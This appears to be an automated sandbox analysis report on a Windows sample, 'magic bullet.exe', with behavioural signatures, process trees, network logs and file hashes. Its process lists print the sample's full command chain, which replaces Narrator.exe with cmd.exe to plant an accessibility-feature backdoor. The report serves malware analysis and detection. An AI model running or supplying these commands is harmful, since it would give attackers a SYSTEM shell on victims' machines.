Analysis Overview
SHA256
6e4dab751fbe948902330e6b3a2d4631c397dd7d2ca697b28495a5fbd457eeb9
Threat Level: Likely malicious
The file magic bullet.exe was found to be: Likely malicious.
Malicious Activity Summary
Possible privilege escalation attempt
Checks computer location settings
Modifies file permissions
File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Drops file in System32 directory
Unsigned PE
Enumerates physical storage devices
Event Triggered Execution: Accessibility Features
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-19 07:52
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-19 07:52
Reported
2024-06-19 07:57
Platform
win7-20240220-en
Max time kernel
119s
Max time network
120s
Command Line
Signatures
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\Narrator.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\System32\Narrator.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\Narrator.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Accessibility Features
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\magic bullet.exe
"C:\Users\Admin\AppData\Local\Temp\magic bullet.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\26B3.tmp\26B4.tmp\26B5.bat "C:\Users\Admin\AppData\Local\Temp\magic bullet.exe""
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\Narrator.exe"
C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\narrator.exe" /reset
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "C:\Windows\System32\Narrator.exe" -Destination "C:\ProgramData" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "C:\Windows\System32\Narrator.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "C:\Windows\System32\cmd.exe" -Destination "C:\Windows\System32\Narrator.exe" -r -force
Network
Files
C:\Users\Admin\AppData\Local\Temp\26B3.tmp\26B4.tmp\26B5.bat
| MD5 | 77f4e1f83104fbc97dcc463422e49a74 |
| SHA1 | 2fd9db1e520bc6e3dbc080002046b1d9648d7c50 |
| SHA256 | 10eed1ec991565617150a585c779035acd9eccf6506a2d7a46c8c9d4e89ccad8 |
| SHA512 | 3bcf11580d6eabd0ef9970bcd6b5273c499698712f892f9e1c3b6b13d45d4970eb126963e9c7f59b6b64d6fac1acb477141ed0a997f13339a234fea750c06da6 |
memory/2616-6-0x000007FEF5CFE000-0x000007FEF5CFF000-memory.dmp
memory/2616-7-0x000000001B640000-0x000000001B922000-memory.dmp
memory/2616-9-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp
memory/2616-8-0x0000000002080000-0x0000000002088000-memory.dmp
memory/2616-10-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp
memory/2616-12-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp
memory/2616-11-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp
memory/2616-13-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp
memory/2616-15-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 25bd33893b2e4aa2aac09baefc2dfc6b |
| SHA1 | 0f28bc7515989cb25b97cc446f93f8d5fa8f58c8 |
| SHA256 | fb138ff46ef7e85e6578ce1e77d0a78becbc189b482366e4a3b90cc1d44e73f9 |
| SHA512 | 9d59fcb0b478e83ff3f086032350c44b6b548a9b4a243667e6bacdb8dd88869157b6bfe271d6282b6c1418770123cfecf6b0845e7e01b987e6b0688ec8edcf87 |
memory/2560-21-0x000000001B670000-0x000000001B952000-memory.dmp
memory/2560-22-0x0000000001DA0000-0x0000000001DA8000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 4a54384f72f6f213c644bceab64bf92c |
| SHA1 | ab498da3a4284529d15fe581c27b217b267d58ab |
| SHA256 | 4dd414093f7619f4a8220cd7cd5231ea7beedb8c10c0ed1ef47656f78528ee68 |
| SHA512 | 7905f8c02849326b1637706f05e1df736203fe94dfa8af1aa12e5dcd917ab380fd1bebe82c6a4d45188c36063d74513fdabf7024d9ddf62c29e563e27086d021 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WR1MTN7N9JIOJ9K48BX6.temp
| MD5 | f9a169d36cf6501389d4ea2cbcecbed1 |
| SHA1 | faed464f6ffe7c32167043614419d86f7b85344f |
| SHA256 | a5cb064b11bb50766a530d4a3a42c0aaf7b6c8f1c8e7be782a3853c2f1452d2e |
| SHA512 | c599445f94cd459ebcc4e68c65a8263cd0b43de2c54d57efc03f6928d787713c55a944802c0ce4b8579d30ae815071d6303935efebb3fed929da9a3f0d51d009 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-19 07:52
Reported
2024-06-19 07:57
Platform
win10v2004-20240611-en
Max time kernel
295s
Max time network
259s
Command Line
Signatures
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\magic bullet.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\Narrator.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\System32\Narrator.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\Narrator.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Accessibility Features
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\magic bullet.exe
"C:\Users\Admin\AppData\Local\Temp\magic bullet.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D07F.tmp\D080.tmp\D081.bat "C:\Users\Admin\AppData\Local\Temp\magic bullet.exe""
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\Narrator.exe"
C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\narrator.exe" /reset
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "C:\Windows\System32\Narrator.exe" -Destination "C:\ProgramData" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "C:\Windows\System32\Narrator.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "C:\Windows\System32\cmd.exe" -Destination "C:\Windows\System32\Narrator.exe" -r -force
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4304,i,12594301322143882025,16832588342008839449,262144 --variations-seed-version --mojo-platform-channel-handle=3048 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.15.31.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.125.209.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\D07F.tmp\D080.tmp\D081.bat
| MD5 | 77f4e1f83104fbc97dcc463422e49a74 |
| SHA1 | 2fd9db1e520bc6e3dbc080002046b1d9648d7c50 |
| SHA256 | 10eed1ec991565617150a585c779035acd9eccf6506a2d7a46c8c9d4e89ccad8 |
| SHA512 | 3bcf11580d6eabd0ef9970bcd6b5273c499698712f892f9e1c3b6b13d45d4970eb126963e9c7f59b6b64d6fac1acb477141ed0a997f13339a234fea750c06da6 |
memory/3348-2-0x00007FFFABFC3000-0x00007FFFABFC5000-memory.dmp
memory/3348-3-0x000001D3EE140000-0x000001D3EE162000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_34rl15lx.zcc.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3348-13-0x00007FFFABFC0000-0x00007FFFACA81000-memory.dmp
memory/3348-14-0x00007FFFABFC0000-0x00007FFFACA81000-memory.dmp
memory/3348-18-0x00007FFFABFC0000-0x00007FFFACA81000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 6cf293cb4d80be23433eecf74ddb5503 |
| SHA1 | 24fe4752df102c2ef492954d6b046cb5512ad408 |
| SHA256 | b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8 |
| SHA512 | 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 50a8221b93fbd2628ac460dd408a9fc1 |
| SHA1 | 7e99fe16a9b14079b6f0316c37cc473e1f83a7e6 |
| SHA256 | 46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e |
| SHA512 | 27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 446dd1cf97eaba21cf14d03aebc79f27 |
| SHA1 | 36e4cc7367e0c7b40f4a8ace272941ea46373799 |
| SHA256 | a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf |
| SHA512 | a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7 |